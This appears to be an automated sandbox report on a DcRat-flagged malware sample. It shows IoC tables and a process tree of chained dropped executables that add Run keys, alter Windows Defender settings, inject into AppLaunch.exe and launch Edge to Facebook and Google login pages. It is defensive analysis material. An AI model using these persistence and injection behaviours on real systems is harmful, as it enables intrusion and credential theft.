Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE
Token: SeDebugPrivilege	2236	source1.exe
Token: SeDebugPrivilege	3728	C279.exe
Token: SeShutdownPrivilege	2500	Explorer.EXE
Token: SeCreatePagefilePrivilege	2500	Explorer.EXE

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe
400	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 780 wrote to memory of 1364	780	4d8a40693acff48ae14d6db938ff88dd9bb181d2a2d20398d65097f5ccf535dc_JC.exe	82
PID 780 wrote to memory of 1364	780	4d8a40693acff48ae14d6db938ff88dd9bb181d2a2d20398d65097f5ccf535dc_JC.exe	82
PID 780 wrote to memory of 1364	780	4d8a40693acff48ae14d6db938ff88dd9bb181d2a2d20398d65097f5ccf535dc_JC.exe	82
PID 1364 wrote to memory of 2960	1364	nT3uK77.exe	83
PID 1364 wrote to memory of 2960	1364	nT3uK77.exe	83
PID 1364 wrote to memory of 2960	1364	nT3uK77.exe	83
PID 2960 wrote to memory of 1200	2960	fG0Iv32.exe	85
PID 2960 wrote to memory of 1200	2960	fG0Iv32.exe	85
PID 2960 wrote to memory of 1200	2960	fG0Iv32.exe	85
PID 1200 wrote to memory of 3676	1200	dV2iu13.exe	86
PID 1200 wrote to memory of 3676	1200	dV2iu13.exe	86
PID 1200 wrote to memory of 3676	1200	dV2iu13.exe	86
PID 1200 wrote to memory of 3872	1200	dV2iu13.exe	92
PID 1200 wrote to memory of 3872	1200	dV2iu13.exe	92
PID 1200 wrote to memory of 3872	1200	dV2iu13.exe	92
PID 3872 wrote to memory of 3256	3872	2BM5023.exe	93
PID 3872 wrote to memory of 3256	3872	2BM5023.exe	93
PID 3872 wrote to memory of 3256	3872	2BM5023.exe	93
PID 3872 wrote to memory of 3256	3872	2BM5023.exe	93
PID 3872 wrote to memory of 3256	3872	2BM5023.exe	93
PID 3872 wrote to memory of 3256	3872	2BM5023.exe	93
PID 3872 wrote to memory of 3256	3872	2BM5023.exe	93
PID 3872 wrote to memory of 3256	3872	2BM5023.exe	93
PID 3872 wrote to memory of 3256	3872	2BM5023.exe	93
PID 3872 wrote to memory of 3256	3872	2BM5023.exe	93
PID 2960 wrote to memory of 4144	2960	fG0Iv32.exe	99
PID 2960 wrote to memory of 4144	2960	fG0Iv32.exe	99
PID 2960 wrote to memory of 4144	2960	fG0Iv32.exe	99
PID 4144 wrote to memory of 1948	4144	3Sv92jt.exe	100
PID 4144 wrote to memory of 1948	4144	3Sv92jt.exe	100
PID 4144 wrote to memory of 1948	4144	3Sv92jt.exe	100
PID 4144 wrote to memory of 572	4144	3Sv92jt.exe	101
PID 4144 wrote to memory of 572	4144	3Sv92jt.exe	101
PID 4144 wrote to memory of 572	4144	3Sv92jt.exe	101
PID 4144 wrote to memory of 572	4144	3Sv92jt.exe	101
PID 4144 wrote to memory of 572	4144	3Sv92jt.exe	101
PID 4144 wrote to memory of 572	4144	3Sv92jt.exe	101
PID 1364 wrote to memory of 4352	1364	nT3uK77.exe	104
PID 1364 wrote to memory of 4352	1364	nT3uK77.exe	104
PID 1364 wrote to memory of 4352	1364	nT3uK77.exe	104
PID 4352 wrote to memory of 2836	4352	4tc111Ko.exe	105
PID 4352 wrote to memory of 2836	4352	4tc111Ko.exe	105
PID 4352 wrote to memory of 2836	4352	4tc111Ko.exe	105
PID 4352 wrote to memory of 2836	4352	4tc111Ko.exe	105
PID 4352 wrote to memory of 2836	4352	4tc111Ko.exe	105
PID 4352 wrote to memory of 2836	4352	4tc111Ko.exe	105
PID 4352 wrote to memory of 2836	4352	4tc111Ko.exe	105
PID 4352 wrote to memory of 2836	4352	4tc111Ko.exe	105
PID 780 wrote to memory of 3296	780	4d8a40693acff48ae14d6db938ff88dd9bb181d2a2d20398d65097f5ccf535dc_JC.exe	108
PID 780 wrote to memory of 3296	780	4d8a40693acff48ae14d6db938ff88dd9bb181d2a2d20398d65097f5ccf535dc_JC.exe	108
PID 780 wrote to memory of 3296	780	4d8a40693acff48ae14d6db938ff88dd9bb181d2a2d20398d65097f5ccf535dc_JC.exe	108
PID 3296 wrote to memory of 1692	3296	5zo2be3.exe	109
PID 3296 wrote to memory of 1692	3296	5zo2be3.exe	109
PID 1692 wrote to memory of 2724	1692	cmd.exe	112
PID 1692 wrote to memory of 2724	1692	cmd.exe	112
PID 1692 wrote to memory of 400	1692	cmd.exe	113
PID 1692 wrote to memory of 400	1692	cmd.exe	113
PID 2724 wrote to memory of 5088	2724	msedge.exe	114
PID 2724 wrote to memory of 5088	2724	msedge.exe	114
PID 400 wrote to memory of 2252	400	msedge.exe	115
PID 400 wrote to memory of 2252	400	msedge.exe	115
PID 2724 wrote to memory of 5060	2724	msedge.exe	116
PID 2724 wrote to memory of 5060	2724	msedge.exe	116
PID 2724 wrote to memory of 5060	2724	msedge.exe	116

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
- C:\Users\Admin\AppData\Local\Temp\4d8a40693acff48ae14d6db938ff88dd9bb181d2a2d20398d65097f5ccf535dc_JC.exe
  "C:\Users\Admin\AppData\Local\Temp\4d8a40693acff48ae14d6db938ff88dd9bb181d2a2d20398d65097f5ccf535dc_JC.exe"
  2⤵
  - DcRat
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:780
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nT3uK77.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nT3uK77.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:1364
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fG0Iv32.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fG0Iv32.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:2960
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\dV2iu13.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\dV2iu13.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:1200
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ap24Pf4.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ap24Pf4.exe
        6⤵
        Modifies Windows Defender Real-time Protection settings
        Executes dropped EXE
        Windows security modification
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3676
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2BM5023.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2BM5023.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3872
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:3256
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 540
        8⤵
        Program crash
        
        PID:1184
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 572
        7⤵
        Program crash
        
        PID:5108
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Sv92jt.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Sv92jt.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4144
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:1948
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:572
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 604
        6⤵
        Program crash
        
        PID:1632
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4tc111Ko.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4tc111Ko.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:4352
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:2836
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 576
        5⤵
        Program crash
        
        PID:3220
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5zo2be3.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5zo2be3.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3296
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1558.tmp\1559.tmp\155A.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5zo2be3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1692
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2724
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffd7fbd46f8,0x7ffd7fbd4708,0x7ffd7fbd4718
        6⤵
        
        PID:5088
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,17427816038963598081,8412793992320264518,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
        6⤵
        
        PID:5060
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,17427816038963598081,8412793992320264518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4428
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:400
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd7fbd46f8,0x7ffd7fbd4708,0x7ffd7fbd4718
        6⤵
        
        PID:2252
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2
        6⤵
        
        PID:4532
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1836
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
        6⤵
        
        PID:4828
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
        6⤵
        
        PID:1412
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
        6⤵
        
        PID:2456
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:1
        6⤵
        
        PID:2960
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:8
        6⤵
        
        PID:2896
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 /prefetch:8
        6⤵
        
        PID:1700
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
        6⤵
        
        PID:3808
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
        6⤵
        
        PID:2320
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
        6⤵
        
        PID:4312
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
        6⤵
        
        PID:3108
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
        6⤵
        
        PID:5604
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
        6⤵
        
        PID:5916
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
        6⤵
        
        PID:5280
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
        6⤵
        
        PID:4540
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6332 /prefetch:1
        6⤵
        
        PID:2924
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,6020832790448356942,3635348867267536688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:1
        6⤵
        
        PID:5600
- C:\Users\Admin\AppData\Local\Temp\6E17.exe
  C:\Users\Admin\AppData\Local\Temp\6E17.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:5404
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\KL8OR2Ub.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\KL8OR2Ub.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:5468
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Gy4Mx4vi.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Gy4Mx4vi.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:5544
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\NR5Tn6kg.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\NR5Tn6kg.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5620
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PI8Eh9it.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PI8Eh9it.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5700
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1dH72iK8.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1dH72iK8.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5816
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:6072
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:6084
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 540
        9⤵
        Program crash
        
        PID:1408
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 568
        8⤵
        Program crash
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ib221qx.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ib221qx.exe
        7⤵
        Executes dropped EXE
        
        PID:5380
- C:\Users\Admin\AppData\Local\Temp\6F21.exe
  C:\Users\Admin\AppData\Local\Temp\6F21.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5476
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:5716
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 388
    3⤵
    - Program crash
    PID:5960
- C:\Users\Admin\AppData\Local\Temp\708A.bat
  "C:\Users\Admin\AppData\Local\Temp\708A.bat"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5596
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\722D.tmp\722E.tmp\722F.bat C:\Users\Admin\AppData\Local\Temp\708A.bat"
    3⤵
    PID:5736
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      PID:5352
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd7fbd46f8,0x7ffd7fbd4708,0x7ffd7fbd4718
        5⤵
        
        PID:5344
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
      4⤵
      PID:5728
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd7fbd46f8,0x7ffd7fbd4708,0x7ffd7fbd4718
        5⤵
        
        PID:5764
